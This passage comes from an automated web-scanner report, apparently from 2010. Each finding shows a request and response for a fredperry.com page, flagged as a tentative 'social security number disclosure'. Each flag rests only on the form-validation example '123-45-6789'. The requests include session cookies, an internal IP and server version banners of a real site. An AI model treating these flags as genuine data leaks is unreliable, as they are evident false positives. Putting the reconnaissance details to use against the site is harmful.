Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Returns
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.20. http://www.fredperry.com/footwear/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /footwear/

Issue detail

The following social security number was disclosed in the response:

Request

GET /footwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:57:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3r1it3pofgpvngtukp6j746v86; expires=Tue, 09-Nov-2010 16:57:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 46894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> footwea
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.21. http://www.fredperry.com/footwear/men/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /footwear/men/

Issue detail

The following social security number was disclosed in the response:

Request

GET /footwear/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:56:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=2ticko8ic5v7jatuh3o1nhvrg3; expires=Tue, 09-Nov-2010 16:56:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47157

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's F
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.22. http://www.fredperry.com/footwear/women/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /footwear/women/

Issue detail

The following social security number was disclosed in the response:

Request

GET /footwear/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:56:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=157a08jjiscuuiu6s8kl72pdt2; expires=Tue, 09-Nov-2010 16:56:59 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 41599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.23. http://www.fredperry.com/heritage/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /heritage/

Issue detail

The following social security number was disclosed in the response:

Request

GET /heritage/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:12:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=aahnr9m6livg8d48om6p1islf4; expires=Tue, 09-Nov-2010 17:12:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30671

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Heritag
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.24. http://www.fredperry.com/home/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /home/

Issue detail

The following social security number was disclosed in the response:

Request

GET /home/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:12 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=sgna25rkqa8aq8ttcgdssdl6p2; expires=Tue, 09-Nov-2010 17:16:12 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42611

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.25. http://www.fredperry.com/js/index.php

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /js/index.php

Issue detail

The following social security number was disclosed in the response:

Request

GET /js/index.php?c=auto&f=,prototype/prototype.js,prototype/validation.js,scriptaculous/builder.js,scriptaculous/effects.js,scriptaculous/dragdrop.js,scriptaculous/controls.js,scriptaculous/slider.js,varien/js.js,varien/form.js,varien/menu.js,mage/translate.js,mage/cookies.js,jquery/jquery-1.2.6.js,defacto/swfobject.js,defacto/jquery.jqzoom.js,defacto/jquery.cycle.all.pack.js,defacto/fp_general.js HTTP/1.1
Host: www.fredperry.com
Proxy-Connection: keep-alive
Referer: http://fredperry.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=VVNKIYS192.168.100.195CKOLQ; path=/
Date: Tue, 09 Nov 2010 15:45:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Cache-Control: must-revalidate
Last-modified: Thu, 20 May 2010 11:06:23 +0000
Expires: Wed, 09 Nov 2011 15:45:19 +0000
Content-Type: text/javascript
Content-Length: 399652

/* Prototype JavaScript framework, version 1.6.0.3
* (c) 2005-2008 Sam Stephenson
*
* Prototype is freely distributable under the terms of an MIT-style license.
* For details, see the Prototype we
...[SNIP]...
something_1, block5, id-4', function (v) {
return Validation.get('IsEmpty').test(v) || /^[A-Z][A-Z0-9_\/-]*$/i.test(v)
}],
['validate-ssn', 'Please enter a valid social security number. For example 123-45-6789.', function(v) {
return Validation.get('IsEmpty').test(v) || /^\d{3}-?\d{2}-?\d{4}$/.test(v);
}],
['validate-zip', 'Please enter a valid zip code. For example 90602 or 90602-1234.', function(v) {

...[SNIP]...

9.26. http://www.fredperry.com/kids/kidswear/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /kids/kidswear/

Issue detail

The following social security number was disclosed in the response:

Request

GET /kids/kidswear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:15:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=fn32chemjgdr3t0veiuc0qrpj2; expires=Tue, 09-Nov-2010 17:15:38 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Kidswea
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.27. http://www.fredperry.com/kids/my-first-fred-perry-shirt-overview/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /kids/my-first-fred-perry-shirt-overview/

Issue detail

The following social security number was disclosed in the response:

Request

GET /kids/my-first-fred-perry-shirt-overview/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:16:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=qqsmus516r13ou38et52qd0l51; expires=Tue, 09-Nov-2010 17:16:01 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30826

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> My Firs
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.28. http://www.fredperry.com/limited-edition/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:02:54 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1bcn29ltg4p3bi0p6q0vc3b0o6; expires=Tue, 09-Nov-2010 17:02:54 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Limited
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.29. http://www.fredperry.com/limited-edition/men/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:03:36 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=70dvf76d894ji7klru7v563he4; expires=Tue, 09-Nov-2010 17:03:36 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's L
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.30. http://www.fredperry.com/limited-edition/men/accessories/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/accessories/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/men/accessories/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:05:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=342ja7lefk74aab9g6o0usja40; expires=Tue, 09-Nov-2010 17:05:45 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.31. http://www.fredperry.com/limited-edition/men/bags/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/bags/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/men/bags/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=oena5tt0klh0432mmfssn6phr5; expires=Tue, 09-Nov-2010 17:07:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.32. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/blank-canvas-stussy/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/men/blank-canvas-stussy/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:07:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=lb05brvppjjou6cdtjuf6hjt66; expires=Tue, 09-Nov-2010 17:07:04 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Stussy
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.33. http://www.fredperry.com/limited-edition/men/british-collectables/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/british-collectables/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/men/british-collectables/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:06:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3rrrvcljl4ka967bmvqmh4ipe4; expires=Tue, 09-Nov-2010 17:06:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 45505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> British
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.34. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.fredperry.com
Path:   /limited-edition/men/collaboration-raf-simons-centenary-outfit/

Issue detail

The following social security number was disclosed in the response:

Request

GET /limited-edition/men/collaboration-raf-simons-centenary-outfit/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:09:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=7g1qu2sogdcde90e6i6ef81lg3; expires=Tue, 09-Nov-2010 17:09:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
. For example http:\/\/www.example.com or www.example.com":"Please enter a valid URL. For example http:\/\/www.example.com or www.example.com","Please enter a valid social security number. For example 123-45-6789.":"Please enter a valid social security number. For example 123-45-6789.","Please enter a valid zip code. For example 90602 or 90602-1234.":"Please enter a valid zip code. For example 90602 or 90602-1234.","Please enter a valid zip code.":"Please enter a valid zip code.",
...[SNIP]...

9.35. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons/

Summary

Severity:   Information
